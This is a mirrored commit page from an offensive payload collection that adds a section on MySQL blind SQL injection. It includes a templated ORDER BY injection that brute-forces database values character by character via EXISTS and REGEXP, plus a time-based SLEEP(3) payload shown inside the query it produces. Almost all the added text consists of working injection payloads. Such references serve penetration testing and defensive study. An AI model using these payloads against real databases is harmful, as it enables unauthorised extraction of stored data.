mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-11-10 07:04:22 +00:00
MySQL Blind Queries and Data Exfiltration via the ORDER BY clause.
This commit is contained in:
chivato
parent
74f2dfccca
commit
29fac06023
1 changed files with 23 additions and 0 deletions
|
|
@ -232,6 +232,29 @@ Works with `MySQL >= 5.1`
|
|||
?id=1 AND SELECT SUBSTR(column_name,1,1) FROM information_schema.columns > 'A'
|
||||
```
|
||||
|
||||
### MySQL Blind SQL Injection in ORDER BY clause using a binary query and REGEXP
|
||||
|
||||
This query basically orders by one column or the other, depending on whether the EXISTS() returns a 1 or not.
|
||||
For the EXISTS() function to return a 1, the REGEXP query needs to match up, this means you can bruteforce blind values character by character and leak data from the database without direct output.
|
||||
|
||||
```
|
||||
[...] ORDER BY (SELECT (CASE WHEN EXISTS(SELECT [COLUMN] FROM [TABLE] WHERE [COLUMN] REGEXP "^[BRUTEFORCE CHAR BY CHAR].*" AND [FURTHER OPTIONS / CONDITIONS]) THEN [ONE COLUMN TO ORDER BY] ELSE [ANOTHER COLUMN TO ORDER BY] END)); -- -
|
||||
```
|
||||
|
||||
### MySQL Blind SQL Injection binary query using REGEXP.
|
||||
|
||||
Payload:
|
||||
```
|
||||
' OR (SELECT (CASE WHEN EXISTS(SELECT name FROM items WHERE name REGEXP "^a.*") THEN SLEEP(3) ELSE 1 END)); -- -
|
||||
```
|
||||
|
||||
Would work in the query (where the "where" clause is the injection point):
|
||||
```
|
||||
SELECT name,price FROM items WHERE name = '' OR (SELECT (CASE WHEN EXISTS(SELECT name FROM items WHERE name REGEXP "^a.*") THEN SLEEP(3) ELSE 1 END)); -- -';
|
||||
```
|
||||
|
||||
In said query, it will check to see if an item exists in the "name" column in the "items" database that starts with an "a". If it will sleep for 3 seconds per item.
|
||||
|
||||
### MYSQL Blind using a conditional statement
|
||||
|
||||
TRUE: `if @@version starts with a 5`:
|
||||
|
|
|
|||
Loading…
Reference in a new issue